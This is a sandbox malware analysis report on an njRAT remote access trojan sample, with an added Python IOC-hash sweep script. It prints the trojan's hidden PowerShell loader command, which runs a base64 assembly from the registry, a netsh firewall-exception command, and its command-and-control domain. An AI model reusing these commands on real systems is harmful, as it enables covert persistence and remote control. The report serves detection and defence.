Windows Analysis Report: ._cache_1.exe

Overview

General Information

Detection | |
---|---|
Score | 100 |
Range | 0 - 100 |
Whitelisted | false |
Confidence | 100% |
Signatures
Classification
- System is w7x64
- ._cache_1.exe (PID: 3172, cmdline: "C:\Users\user\Desktop\._cache_1.exe", MD5: 62C01F1B2AC0A7BAB6C3B50FD51E6A36)
- Tr.exe (PID: 3196, cmdline: "C:\Users\user\AppData\Local\Temp\Tr.exe", MD5: 4D3B21451ED0EE3EE65888D4C8944693)
- cmd.exe (PID: 3248, cmdline: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
- powershell.exe (PID: 3276, cmdline: powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- netsh.exe (PID: 3396, cmdline: netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE, MD5: 637982A421D0133DCEAA0D1490D1DC9C)
- cmd.exe (PID: 3452, cmdline: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
- powershell.exe (PID: 3480, cmdline: powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- x.exe (PID: 3612, cmdline: "C:\Users\user\AppData\Local\Temp\x.exe", MD5: 62C01F1B2AC0A7BAB6C3B50FD51E6A36)
- Tr.exe (PID: 3640, cmdline: "C:\Users\user\AppData\Local\Temp\Tr.exe", MD5: 4D3B21451ED0EE3EE65888D4C8944693)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link
---|---|---|---|---
NjRAT | RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives." It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored. | | |
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_Njrat | Yara detected Njrat | Joe Security |
 | Windows_Trojan_Njrat_30f3c220 | unknown | unknown |
 | RAT_njRat | Detects njRAT | Kevin Breen <kevin@techanarchy.net> |
 | njrat1 | Identify njRat | Brian Wallace @botnet_hunter |
 | JoeSecurity_Njrat | Yara detected Njrat | Joe Security |

Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_Njrat | Yara detected Njrat | Joe Security |
 | Windows_Trojan_Njrat_30f3c220 | unknown | unknown |
 | RAT_njRat | Detects njRAT | Kevin Breen <kevin@techanarchy.net> |
 | njrat1 | Identify njRat | Brian Wallace @botnet_hunter |
 | MALWARE_Win_NjRAT | Detects NjRAT / Bladabindi | ditekSHen |
System Summary

Source | Author
---|---
 | Florian Roth (Nextron Systems)
 | Jonathan Cheong, oscd.community
 | Florian Roth (Nextron Systems)
 | frack113
 | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
 | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
 | frack113, Florian Roth (Nextron Systems)
 | Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
 | frack113
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
---|---|---|---|---|---
07/01/24-10:21:49.438511 | 2017419 | 49162 | 1177 | TCP | A Network Trojan was detected
07/01/24-10:22:03.684189 | 2017419 | 49163 | 1177 | TCP | A Network Trojan was detected
07/01/24-10:22:16.980393 | 2017419 | 49164 | 1177 | TCP | A Network Trojan was detected
07/01/24-10:22:30.431063 | 2017419 | 49165 | 1177 | TCP | A Network Trojan was detected
07/01/24-10:22:43.879655 | 2017419 | 49166 | 1177 | TCP | A Network Trojan was detected
07/01/24-10:22:57.541620 | 2017419 | 49167 | 1177 | TCP | A Network Trojan was detected
07/01/24-10:23:11.211027 | 2017419 | 49168 | 1177 | TCP | A Network Trojan was detected
07/01/24-10:23:24.901144 | 2017419 | 49169 | 1177 | TCP | A Network Trojan was detected
07/01/24-10:23:38.664413 | 2017419 | 49170 | 1177 | TCP | A Network Trojan was detected
07/01/24-10:23:52.503013 | 2017419 | 49171 | 1177 | TCP | A Network Trojan was detected
07/01/24-10:24:06.132111 | 2017419 | 49172 | 1177 | TCP | A Network Trojan was detected
07/01/24-10:24:19.571508 | 2017419 | 49173 | 1177 | TCP | A Network Trojan was detected
07/01/24-10:24:33.177434 | 2017419 | 49174 | 1177 | TCP | A Network Trojan was detected
07/01/24-10:24:46.813104 | 2017419 | 49175 | 1177 | TCP | A Network Trojan was detected
07/01/24-10:25:00.126873 | 2017419 | 49176 | 1177 | TCP | A Network Trojan was detected
07/01/24-10:25:13.886977 | 2017419 | 49177 | 1177 | TCP | A Network Trojan was detected
07/01/24-10:25:27.489939 | 2017419 | 49178 | 1177 | TCP | A Network Trojan was detected
AV Detection
Networking
E-Banking Fraud
System Summary
Data Obfuscation
Boot Survival |
---|
Source: | Registry value created or modified: | Jump to behavior |
Source: | Registry value created or modified: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Registry value created or modified: | Jump to behavior | ||
Source: | Registry value created or modified: | Jump to behavior |
Source: | Code function: | 0_2_0047A330 | |
Source: | Code function: | 0_2_00434418 | |
Source: | Code function: | 1_2_00AC4A35 | |
Source: | Code function: | 1_2_00B453DF | |
Source: | Code function: | 12_2_003A4A35 | |
Source: | Code function: | 12_2_004253DF |
Source: | Code function: | 1_2_00AE3307 |
- Process information set: 173 matches
- Thread delayed: 3 matches
- Window / User API: 8 matches
- Evasive API call chain: graph_0-83066 and 1 further match
- API coverage: 3 matches
- Thread sleep time: 8 matches
- Code function: 0_2_004339B6, 0_2_0044BD27, 0_2_0044BF8B, 0_2_00452492, 0_2_00442886, 0_2_004788BD, 0_2_0045CAFA, 0_2_00431A86, 0_2_0045DE8F, 1_2_00B2449B, 1_2_00B2C7E8, 1_2_00B2C75D, 1_2_00B2F021, 1_2_00B2F17E, 1_2_00B2F47F, 1_2_00B23833, 1_2_00B23B56, 1_2_00B2BD48, 12_2_0040449B, 12_2_0040C75D, 12_2_0040C7E8, 12_2_0040F021, 12_2_0040F17E, 12_2_0040F47F, 12_2_00403833, 12_2_00403B56, 12_2_0040BD48
- Code function: 0_2_0040E500
- Thread delayed: 3 matches
- File opened: 6 matches
- API call chain: graph_0-82189
- Process information queried: 1 match
- Code function: 0_2_0045A370
- Code function: 0_2_0040D590
- Code function: 1_2_00AF5BFC
- Code function: 0_2_0040EBD0
- Code function: 0_2_004238DA
- Process token adjusted: 2 matches
- Code function: 0_2_0041F250, 0_2_0041A208, 0_2_00417DAA, 1_2_00AEA2A4, 1_2_00AEA2D5, 12_2_003CA2A4, 12_2_003CA2D5
HIPS / PFW / Operating System Protection Evasion
- Process created: 1 match
- Code function: 0_2_00436CD7
- Code function: 0_2_0040D590
- Code function: 0_2_00434418
- Code function: 0_2_0043333C
- Process created: 5 matches
- Process created: 2 matches
- Code function: 0_2_00446124
- Code function: 1_2_00B24A08
- Binary or memory string: 8 matches
- Code function: 1_2_00AE87AB
- Queries volume information: 36 matches
- Code function: 0_2_004720DB
- Code function: 0_2_00472C3F
- Code function: 0_2_0041E364
- Code function: 0_2_0040E500
Lowering of HIPS / PFW / Operating System Security Settings
- Registry value created: 1 match
- Process created: 1 match
- Process created: 1 match
Stealing of Sensitive Information
- File source: 5 matches
- Binary or memory string: 8 matches
Remote Access Functionality
- File source: 5 matches
- Code function: 0_2_004652BE, 0_2_00476619, 0_2_0046CEF3, 1_2_00B36399, 1_2_00B3685D, 12_2_00416399, 12_2_0041685D
MITRE ATT&CK Matrix (a leading number is the count of matched signatures mapped to that technique; cells without a number are the unmatched matrix template)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 31 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | 1 Replication Through Removable Media | 11 Command and Scripting Interpreter | 2 Valid Accounts | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 21 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | 221 Registry Run Keys / Startup Folder | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 Software Packing | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 1 DLL Side-Loading | LSA Secrets | 25 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 221 Registry Run Keys / Startup Folder | 11 Masquerading | Cached Domain Credentials | 13 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Valid Accounts | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Virtualization/Sandbox Evasion | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 11 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 Remote System Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
81% | ReversingLabs | Win32.Backdoor.Bladabhindi | ||
69% | Virustotal | Browse | ||
100% | Avira | HEUR/AGEN.1321308 | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira | HEUR/AGEN.1321308 | ||
100% | Joe Sandbox ML | |||
100% | Joe Sandbox ML | |||
81% | ReversingLabs | Win32.Backdoor.Bladabhindi | ||
67% | Virustotal | Browse | ||
81% | ReversingLabs | Win32.Backdoor.Bladabhindi | ||
69% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
9% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
(15 URLs, strings not preserved) | 0% | URL Reputation (7), Avira URL Cloud (5), Virustotal (3) | safe | |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
water-boom.duckdns.org | 192.169.69.25 | true | true | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
(11 further names, not preserved) | | false | | unknown |
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
192.169.69.25 | water-boom.duckdns.org | United States | 23033 | WOWUS | true |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1465120 |
Start date and time: | 2024-07-01 10:20:39 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 9m 23s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 14 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | ._cache_1.exe |
Detection: | MAL |
Classification: | mal100.phis.troj.evad.winEXE@14/16@28/1 |
EGA Information: | |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): WMIADAP.exe, conhost.exe
- Not all processes were analysed; the report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size exceeded maximum capacity and may have missing disassembly code.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
01:21:46 | Autostart | |
04:21:26 | API Interceptor | |
04:21:38 | API Interceptor | |
04:21:42 | API Interceptor | |
04:21:57 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
192.169.69.25 | | Get hash | malicious | Unknown | Browse | |
 | | Get hash | malicious | WSHRAT | Browse | |
 | | Get hash | malicious | Unknown | Browse | |
 | | Get hash | malicious | Unknown | Browse | |
 | | Get hash | malicious | ADWIND WSHRAT | Browse | |
 | | Get hash | malicious | ADWIND WSHRAT | Browse | |
 | | Get hash | malicious | Unknown | Browse | |
 | | Get hash | malicious | Lokibot | Browse | |
 | | Get hash | malicious | WSHRat | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
WOWUS | | Get hash | malicious | Njrat | Browse | |
 | | Get hash | malicious | Unknown | Browse | |
 | | Get hash | malicious | Unknown | Browse | |
 | | Get hash | malicious | XWorm | Browse | |
 | | Get hash | malicious | AgentTesla, SugarDump, XWorm | Browse | |
 | | Get hash | malicious | Nanocore | Browse | |
 | | Get hash | malicious | Unknown | Browse | |
 | | Get hash | malicious | Unknown | Browse | |
 | | Get hash | malicious | Unknown | Browse | |
 | | Get hash | malicious | Unknown | Browse | |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6916 |
Entropy (8bit): | 4.765218321768022 |
Encrypted: | false |
SSDEEP: | 192:Mxoe5AVFn3eGOVpN6K3bkkjo58gkjDt4iWN3yBGH+dcU6CIVsm5emd:RVoGIpN6KQkj2Lkjh4iUxV |
MD5: | 665354A1A9139D1FA96E6FCC7F1FCE73 |
SHA1: | 8477F42550FBBA457D4015AAAC889272C7FAF1D8 |
SHA-256: | 146FDB9501A06132126EE69A643DDBF1222DE922D3B59E282BDE97AF5186CD01 |
SHA-512: | F61A4F30A60A5F63619467D31D928ED428119EB4783ECFA7938A2213B879B3B17DD231389386319F5E756C0CDD075FF5B861646ECFF791D8AD1EA152F2B045CD |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 0.34726597513537405 |
Encrypted: | false |
SSDEEP: | 3:Nlll:Nll |
MD5: | 446DD1CF97EABA21CF14D03AEBC79F27 |
SHA1: | 36E4CC7367E0C7B40F4A8ACE272941EA46373799 |
SHA-256: | A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF |
SHA-512: | A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Users\user\Desktop\._cache_1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 915456 |
Entropy (8bit): | 6.744106843807966 |
Encrypted: | false |
SSDEEP: | 12288:pCdOy3vVrKxR5CXbNjAOxK/j2n+4YG/6c1mFFja3mXgcjfRlgsUBga1T1W+MQ:pCdxte/80jYLT3U1jfsWahI+MQ |
MD5: | 4D3B21451ED0EE3EE65888D4C8944693 |
SHA1: | DCFEC58EC8D9D8EC45D0B033DB4462F1DAFE5AB3 |
SHA-256: | 25BC108A683D25A77EFCAC89B45F0478D9DDD281A9A2FB1F55FC6992A93AA830 |
SHA-512: | 5D70915816DC4FA3C83EE6CE5445CB6AEA0421601B38DA04679C1FFED5B980ACF05E8F6E6348FE7BE4907A85679B0A44FF9D95AB076D2E8368D78067860946EC |
Malicious: | true |
Antivirus: | |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\._cache_1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 549694 |
Entropy (8bit): | 7.768792119579801 |
Encrypted: | false |
SSDEEP: | 12288:2jTK1zAd1HfdTexNnGnZAbwXVSsaoCeFoHiS7fYXk0Qps:2TK1zMHfIrWEw9a/b3gXkH2 |
MD5: | FBC5F5BB74C7CE2B59F38B8954EF694C |
SHA1: | 9F5C574C4EC6BE64F7AD25260BFE7593F166E0F4 |
SHA-256: | 3FBAF6860196EDE7B63F3CADABD95FD0A111F2214894C12A5FB0CBB6CE657615 |
SHA-512: | 096BC45CA63CEFF8A6F429CF0786869B87D5A856504C915CD4DE7F04DEA92229AA0010D3536C340F6AF3713FF52A9BA4CA4B8714D3C29B1780F64A509D011342 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\AppData\Local\Temp\x.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 549694 |
Entropy (8bit): | 7.768792119579801 |
Encrypted: | false |
SSDEEP: | 12288:2jTK1zAd1HfdTexNnGnZAbwXVSsaoCeFoHiS7fYXk0Qps:2TK1zMHfIrWEw9a/b3gXkH2 |
MD5: | FBC5F5BB74C7CE2B59F38B8954EF694C |
SHA1: | 9F5C574C4EC6BE64F7AD25260BFE7593F166E0F4 |
SHA-256: | 3FBAF6860196EDE7B63F3CADABD95FD0A111F2214894C12A5FB0CBB6CE657615 |
SHA-512: | 096BC45CA63CEFF8A6F429CF0786869B87D5A856504C915CD4DE7F04DEA92229AA0010D3536C340F6AF3713FF52A9BA4CA4B8714D3C29B1780F64A509D011342 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
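The dropped-file records above that share MD5 C4CA4238A0B923820DCC509A6F75849B are one byte long with entropy 0.0, and that MD5/SHA-1/SHA-256/SHA-512 set is the well-known digest set of the single ASCII character "1", so these entries are analysis noise rather than payloads. The Python below is an added example, not part of the Joe Sandbox report: it recomputes the report's four digest fields and its 8-bit Shannon entropy for arbitrary bytes, confirms the "1" reading, and sweeps a directory against the SHA-256 values this report marks Malicious: true (the 915456-, 1178304- and 26-byte drops) so the same IOCs can be hunted on a suspect host. All sample files are constructed in a temporary directory; the 64-byte sample is built to reproduce the 0.34726597513537405 entropy of the 64-byte PowerShell drop listed above, which is consistent with 61 identical bytes plus three distinct singletons, but that byte layout is an inference and not something the report states.

```python
import hashlib
import math
import tempfile
from collections import Counter
from pathlib import Path

# SHA-256 values the report marks "Malicious: true" (copied from the dropped-file records).
REPORT_MALICIOUS_SHA256 = {
    "25BC108A683D25A77EFCAC89B45F0478D9DDD281A9A2FB1F55FC6992A93AA830",  # 915456-byte drop
    "C46A631F0BC82D8C2D46E9D8634CC50242987FA7749CAC097439298D1D0C1D6E",  # 1178304-byte drop
    "255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309",  # 26-byte drop
}

# SHA-256 values the report marks "Malicious: false" that are pure analysis noise
# (the 1-byte PowerShell drops), listed so a sweep can ignore them explicitly.
REPORT_BENIGN_SHA256 = {
    "6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B",  # sha256(b"1")
}


def hash_blob(data: bytes) -> dict:
    """Return the four digests the report lists, upper-case hex like the report."""
    return {
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), i.e. the report's 'Entropy (8bit)' field."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(data: bytes) -> str:
    """Label a blob by SHA-256 against the report's malicious and known-noise hash sets."""
    digest = hash_blob(data)["sha256"]
    if digest in REPORT_MALICIOUS_SHA256:
        return "malicious-ioc"
    if digest in REPORT_BENIGN_SHA256:
        return "benign-report-artifact"
    return "unknown"


def sweep(root: str) -> dict:
    """Walk a directory tree; return {posix relative path: (classification, entropy)}."""
    results = {}
    root_path = Path(root)
    for path in sorted(p for p in root_path.rglob("*") if p.is_file()):
        data = path.read_bytes()
        results[path.relative_to(root_path).as_posix()] = (
            classify(data),
            round(shannon_entropy_8bit(data), 6),
        )
    return results


# Constructed sample inputs (not files from the report):
SAMPLE_ONE_BYTE = b"1"                            # reproduces the 1-byte drops exactly
SAMPLE_64_BYTES = b"\x00" * 61 + b"\x01\x02\x03"  # hypothetical layout matching entropy 0.347265975...


def demo() -> dict:
    """Write the constructed samples to a temp tree and sweep it."""
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "one.bin").write_bytes(SAMPLE_ONE_BYTE)
        (Path(tmp) / "sixtyfour.bin").write_bytes(SAMPLE_64_BYTES)
        (Path(tmp) / "sub").mkdir()
        (Path(tmp) / "sub" / "other.txt").write_bytes(b"hello")
        return sweep(tmp)


if __name__ == "__main__":
    for name, (verdict, entropy) in demo().items():
        print(f"{name}: {verdict}, entropy={entropy}")
```

Point `sweep()` at a real directory (a collected %TEMP% or Desktop tree) to hunt for the three malicious drops; anything reported as `unknown` with entropy above roughly 7 deserves a closer look, since the two packed drops above sit at 7.46 and 7.77.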
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\._cache_1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1178304 |
Entropy (8bit): | 7.456452138313528 |
Encrypted: | false |
SSDEEP: | 24576:HRmJkcoQricOIQxiZY1iagI+bpJBIAkPcJCqbVvi1N:sJZoQrbTFZY1iagTpVkybVqT |
MD5: | 62C01F1B2AC0A7BAB6C3B50FD51E6A36 |
SHA1: | CFC301A04B9A4FFEB0DC4578C1998A4EB4754F7B |
SHA-256: | C46A631F0BC82D8C2D46E9D8634CC50242987FA7749CAC097439298D1D0C1D6E |
SHA-512: | 6617B2723526A8F569D796352E21FB902D1DB76DD3A3C6B6562915A7FB087B7E65871921FCDC97871B302D77EFA0B60D63872BB0B8BAE4A7D982486428CD43AB |
Malicious: | true |
Antivirus: | |
Preview: |
Process: | C:\Users\user\Desktop\._cache_1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | true |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6045 |
Entropy (8bit): | 3.5897762024878896 |
Encrypted: | false |
SSDEEP: | 96:HbhQCwO4IyqvsqvJCwo1etn5/bHWdkn5/bHydf:HbWCo1et9Kdk9udf |
MD5: | 9441DDC3CCCBF7C0B5A921C96BB2FB49 |
SHA1: | A77B0A1A047995EE2C62828AD9F03BB64B3C1CC9 |
SHA-256: | 487D5CD7B88EA3B2DEFE1E836ADD74DA3DBD8C2D8235E27EACA38C621A8FCD45 |
SHA-512: | F3CA77CEBD03A66D83BB12C9CA53DE14756F39E2EA76598413DCDE5AA70712005876469DDD297C48C47E17C259FE8640D53F350688F13D072517E405859889B1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF44a554.TMP (copy)
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6045 |
Entropy (8bit): | 3.5897762024878896 |
Encrypted: | false |
SSDEEP: | 96:HbhQCwO4IyqvsqvJCwo1etn5/bHWdkn5/bHydf:HbWCo1et9Kdk9udf |
MD5: | 9441DDC3CCCBF7C0B5A921C96BB2FB49 |
SHA1: | A77B0A1A047995EE2C62828AD9F03BB64B3C1CC9 |
SHA-256: | 487D5CD7B88EA3B2DEFE1E836ADD74DA3DBD8C2D8235E27EACA38C621A8FCD45 |
